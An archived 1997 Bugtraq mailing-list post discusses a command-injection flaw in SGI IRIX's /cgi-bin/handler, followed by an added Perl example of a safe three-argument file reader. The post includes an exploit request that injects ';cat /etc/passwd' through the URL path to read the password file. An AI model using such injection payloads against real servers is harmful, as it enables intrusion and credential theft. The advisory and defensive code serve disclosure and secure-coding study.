Bugtraq mailing list archives

Re: /cgi-bin/handler - more notes


From: mouse () RODENTS MONTREAL QC CA (der Mouse)
Date: Fri, 20 Jun 1997 15:37:02 -0400


I have had reports that my exploit for SGI's /cgi-bin/handler does
not work on IRIX 6.3 (on O2).  I analyzed the code provided with IRIX
6.3 and they tried to fix it, but they actually DID NOT.

telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download
HTTP/1.0

[...To fix this right...]
All "open" commands should check if their argument is really a
filename.  You could use:

-f $doc && open (INPUT, $doc)

If you have untrusted local users who can install their own cgi-bin
stuff (I know of at least one large site that is in this situation),
this isn't enough.  /cgi-bin/handler/whatever;cat\t/etc/passwd\|\t may
well exist, and open() will _still_ take it as a pipe.

So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
Anyone on IRIX 6.4? :) (What does it run on BTW?)

I know of one site with an Octane that runs 6.4.  I'd try this, but
that site runs exactly one web server, and it ain't SGI's.  I could
turn on the web server on the Octane, I suppose, but I'm hesitant to
mess with it....

                                        der Mouse

                               mouse () rodents montreal qc ca
                     7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B
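As an added illustration of the point above (this is not code from the original post, nor from SGI's handler): a Perl reader that fixes the open mode in the code rather than letting the request string choose it. The temp directory, the file name ending in `|` and its contents are all constructed here; the `read_doc` function and its rejection rules are this example's own, not the handler's.

```perl
#!/usr/bin/perl
# Added example, not the original post's or SGI's code: a document reader
# that never lets the requested name select how open() behaves.
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;

# Three-argument open with a fixed mode: a name that ends in '|' or begins
# with '<', '>' or '|' is plain bytes in a file name, never a pipe spec.
# The -f test from the thread is not needed for that, and does not help
# on its own, because a file with such a name can really exist.
sub read_doc {
    my ($docroot, $name) = @_;

    # Only simple names under the document root: no separators, no NUL,
    # no "." or "..".  Anything else is refused before open() is reached.
    return (undef, 'bad name')
        if !defined $name || $name eq ''
        || $name =~ m{[/\\\0]} || $name =~ /\A\.\.?\z/;

    my $path = File::Spec->catfile($docroot, $name);
    open(my $in, '<', $path) or return (undef, "open: $!");   # mode fixed here
    local $/;
    my $data = <$in>;
    close $in;
    return ($data, undef);
}

# --- demonstration with a constructed document root ---------------------
my $docroot = tempdir(CLEANUP => 1);

# Constructed name whose trailing '|' would make the two-argument form
# open(INPUT, $doc) treat it as a pipeline instead of a file.
my $hostile = "quarterly report|";
my $hostile_path = File::Spec->catfile($docroot, $hostile);
open(my $out, '>', $hostile_path) or die "create: $!";
print $out "literal file contents\n";
close $out;

# -f is true for it, so "-f $doc && open(INPUT, $doc)" would pass the guard
# and still hand the name to a two-argument open().
printf "-f on hostile name: %s\n", (-f $hostile_path) ? 'true' : 'false';

my ($data, $err) = read_doc($docroot, $hostile);
print "3-arg open read: $data";            # file contents, no pipeline

($data, $err) = read_doc($docroot, '../passwd');
print "traversal rejected: $err\n";        # bad name

($data, $err) = read_doc($docroot, 'missing.txt');
print "missing file: $err\n";              # open: No such file or directory
```

The name check is a second, independent layer: the three-argument open alone already removes the pipe interpretation, and the check keeps the reader inside the document root regardless of how the request was parsed upstream.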